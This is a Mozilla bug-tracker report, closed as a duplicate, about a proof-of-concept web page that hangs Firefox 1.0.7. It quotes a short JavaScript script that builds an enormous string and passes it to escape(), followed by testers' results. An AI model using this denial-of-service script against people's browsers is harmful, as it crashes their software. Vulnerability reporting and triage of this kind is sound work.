Closed Bug 312102 Opened 19 years ago Closed 19 years ago

Working Denial of service exploit crashes Firefox 1.07

Categories

(Core :: JavaScript Engine, defect)

Product:
Core
Component:
JavaScript Engine
Version:
1.7 Branch
Type:
defect
Priority:
Not set
Severity:
critical

Tracking

()

Status:
RESOLVED DUPLICATE of bug 303213

People

(Reporter: jp.senior, Unassigned)

References

(
URL
)

Details

User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7

See the following:
http://www.triviasecurity.net/exploits/Mozilla_Firefox_%3C=_1.0.7_Integar_Overflow_Denial_of_Service_Exploit

Contains the source:
<html>
        Copyright Georgi Guninski
        <br>
        Cannot be used in vulnerability databases
        <br>
        Especially securityfocus/mitre/cve/cert
        <script>
        var s=String.fromCharCode(257);
        var ki="";
        var me="";
        for(i=0;i<1024;i++)
        {ki=ki+s;}
        for(i=0;i<1024;i++)
        {me=me+ki;}
        var ov=s;
        for(i=0;i<28;i++) ov += ov;
        for(i=0;i<88;i++) ov += me;

        alert("done generating");
        var fuckbill=escape(ov);
        alert("done escape");
        alert(fuckbill);
        </script>
</html>

Reproducible: Always

Steps to Reproduce:

Actual Results:  
Firefox immediately locked up
I had other people test this on various OS's.  This is confirmed to work.
Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.9a1) Gecko/20051010
Firefox/1.6a1

I don't see a crash or hang, but Firefox says "Out of memory" in the JavaScript
console during the escape() step.  I never ese the "done escape" message.  I
think "Out of memory" is bogus in this case, btw.
Same with Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12)
Gecko/20050914 Firefox/1.0.7.
With Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9a1) Gecko/20051007
Firefox/1.6a1, I get "out of memory" before it even gets to the "done
generating" message.
> I think "Out of memory" is bogus in this case, btw.

Never mind.  After re-reading the script I see that it is generating a
ridiculously long string.
Assignee: nobody → general
Component: Security → JavaScript Engine
Product: Firefox → Core
QA Contact: firefox → general
Version: unspecified → 1.7 Branch
(In reply to comment #1)
> I had other people test this on various OS's.  This is confirmed to work.

Define "work" -- we think we fixed this in 1.0.7

see bug 303213 and bug 305190

*** This bug has been marked as a duplicate of 303213 ***
Group: security
Status: UNCONFIRMED → RESOLVED
Closed: 19 years ago
Resolution: --- → DUPLICATE
You need to log in before you can comment on or make changes to this bug.